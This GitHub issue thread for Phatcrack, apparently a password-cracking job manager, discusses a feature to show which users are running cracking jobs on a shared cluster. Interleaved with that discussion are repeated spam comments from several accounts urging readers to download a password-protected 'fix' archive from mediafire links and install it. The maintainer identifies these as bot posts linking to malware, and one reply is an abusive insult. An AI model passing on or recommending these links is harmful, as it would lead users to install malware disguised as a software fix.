### ISSUE TITLE
View other user's attacks

### ISSUE THREAD

**Issue by rtan-aura** [lachlan2k/phatcrack#43]
In a multi-user environment, it is worthwhile to view other user's cracking status.

Knowing who's running an attack can help coordinate resource sharing.

**Comment by JSmith-Aura** [comment]
Yep to temper this, I would say instead of seeing specifically what another user is doing. Just having a utilisation of who is cracking at all is quite nice, and what that utilisation looks like for the cluster.

**Comment by lachlan2k** [comment]
Yeah, @JSmith-Aura and I discussed this the other day.

In the long term, Phatcrack will have a much smarter-er scheduler and allow job priority, queuing, etc and will make a really nice global queue screen when I do that.

In the meantime though, I'd be glad to add a simple page that has a breakdown of who is doing what (but won't show project details, etc.)

**Comment by rtan-aura** [comment]
A simple page listing who's running attacks with elapsed and estimated time left is sufficient :)

User can hit up the other person offline to discuss.

**Comment by rtan-aura** [comment]
Hand slipped...

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NHAS** [comment]
@amir1387aht  fuck off cunt

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lachlan2k** [comment]
Random note: This issue is being comment spammed by bots linking to malware. So uh, don't follow sketchy links

**Comment by lachlan2k** [comment]
Basic support has been added in v0.5 :)

**Comment by rtan-aura** [comment]
Awesome thanks Lachlan! 🤩
